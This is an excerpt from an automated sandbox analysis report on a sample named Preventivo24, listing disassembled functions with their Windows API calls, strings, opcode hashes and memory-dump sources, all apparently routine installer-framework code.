                                                                              • API ID: Path
                                                                              • String ID: \\?\$\\?\UNC\
                                                                              • API String ID: 2875597873-3019864461
                                                                              • Opcode ID: 95e0f0447e8917157fb5f09440ea203f0437dddad4101e72c3194a69e0eda0f0
                                                                              • Instruction ID: 50e57c502109055e8ef496d9a01bcdbefa4e4bf0edee592ea19d79bd6f582f0d
                                                                              • Opcode Fuzzy Hash: 95e0f0447e8917157fb5f09440ea203f0437dddad4101e72c3194a69e0eda0f0
                                                                              • Instruction Fuzzy Hash: 8851D1B1E00204DBDB24DF68C845BAEBBF4FF59718F10861EE8556B241EBB16948CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • OpenEventW.KERNEL32(00000000,00000000,B5580983,_pbl_evt,00000008,?,?,0115B278,00000001,B5580983,?), ref: 01028EBE
                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 01028EDB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Event$CreateOpen
                                                                              • String ID: _pbl_evt
                                                                              • API String ID: 2335040897-4023232351
                                                                              • Opcode ID: d88fdfe9e83127cf02de1371b7dc90c0a33cc20eca45eee1359a37fcc1281f18
                                                                              • Instruction ID: 189eb64e855e793f5f05aee225639f1f1aa67de6a9bd46e98d024072444a3da0
                                                                              • Opcode Fuzzy Hash: d88fdfe9e83127cf02de1371b7dc90c0a33cc20eca45eee1359a37fcc1281f18
                                                                              • Instruction Fuzzy Hash: DD51B071D04618EFDB14DF68CD45BEEB7F8EB04710F10821AE865B7680EB746A04CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,80000002,B5580983,?,80000002,011D0080), ref: 00FF77EF
                                                                              • CreateDirectoryW.KERNEL32(80000002,00000000,?,80000002,011D0080), ref: 00FF7850
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryPathTemp
                                                                              • String ID: ADVINST_LOGS
                                                                              • API String ID: 2885754953-2492584244
                                                                              • Opcode ID: b9aeef73269ec096031f1b7e18840262d75281bb8a4309b06f16ce291fa9abe3
                                                                              • Instruction ID: c073ce2977785cafca0148a58470e195d8dd632f8c1b8d6e0c0da163ed3d1787
                                                                              • Opcode Fuzzy Hash: b9aeef73269ec096031f1b7e18840262d75281bb8a4309b06f16ce291fa9abe3
                                                                              • Instruction Fuzzy Hash: 9851C175D04219CACB30AF28C8487BAF3B4FF14764F2446AED995972A0EB754D81DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • WriteFile.KERNEL32(?,00000005,?,?,00000000,011456A4,00000002,?,00000000,CPU: ,00000005), ref: 00FF7071
                                                                              • FlushFileBuffers.KERNEL32(?), ref: 00FF707A
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$BuffersFindFlushHeapProcessResourceWrite
                                                                              • String ID: CPU:
                                                                              • API String ID: 2793600070-1724696780
                                                                              • Opcode ID: 52814f4d92d5a848142dc845ff7f9c670ac1cc1252f3cee971a156ebae8052ce
                                                                              • Instruction ID: d71a94015ed1dbe34b774094831d6d1a14ce0366f4ab0f099e446676b36bab7f
                                                                              • Opcode Fuzzy Hash: 52814f4d92d5a848142dc845ff7f9c670ac1cc1252f3cee971a156ebae8052ce
                                                                              • Instruction Fuzzy Hash: 91418E31A006099BC714EBA8DD49BAEFBB5FF44320F144269E925A73D1DB35AD01CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 00ECD8C5
                                                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 00ECD8CB
                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 00ECD95C
                                                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 00ECD962
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: 37ffe8be71f5bc7fa14b4c2e3af040a9dfaba1bf5205342143112de11e5ef90d
                                                                              • Instruction ID: 07f1e6376813ddceb9a3a4f09a58c745568bca9021b39a4ed27ab249e7c45248
                                                                              • Opcode Fuzzy Hash: 37ffe8be71f5bc7fa14b4c2e3af040a9dfaba1bf5205342143112de11e5ef90d
                                                                              • Instruction Fuzzy Hash: 90C19C71D04219DFDB14DBA4CD44FAEBBB8BF48314F1041ADE415AB291DB76AD06CB60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetParent.USER32(0000000F), ref: 00EAE89C
                                                                              Strings
                                                                              • Unknown exception, xrefs: 00EAE871
                                                                              • C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00EAE881
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Parent
                                                                              • String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                                              • API String ID: 975332729-9186675
                                                                              • Opcode ID: 5296ebd53f56f270d32ac3513b34e5a01300a53872a914ea0d0461b8f2f11f7c
                                                                              • Instruction ID: e6a0f9e2f13271e6fbd4ca2b2232a566cec6b20342193f80885166abc7d17e23
                                                                              • Opcode Fuzzy Hash: 5296ebd53f56f270d32ac3513b34e5a01300a53872a914ea0d0461b8f2f11f7c
                                                                              • Instruction Fuzzy Hash: 84014B30D0528CEEDB05EBE8CA197DDBFB1AB21304F544098E0457B292DBF45A48D792
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00E96313
                                                                              • Unknown exception, xrefs: 00E96300
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                              • API String ID: 2558294473-2631306498
                                                                              • Opcode ID: a1729b2f8a787cdc48fe061be4b9293613351c9722e02ff457544a3e6473d44d
                                                                              • Instruction ID: 8ce4bbba64d33d5c48b0303c520c83f4ff42eb89da222c6148184a5868ba1035
                                                                              • Opcode Fuzzy Hash: a1729b2f8a787cdc48fe061be4b9293613351c9722e02ff457544a3e6473d44d
                                                                              • Instruction Fuzzy Hash: 50F0CD30D0628CDADB05E7E9C9157CDBFB06B61704F545098E0457B286DBF40B08E792
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%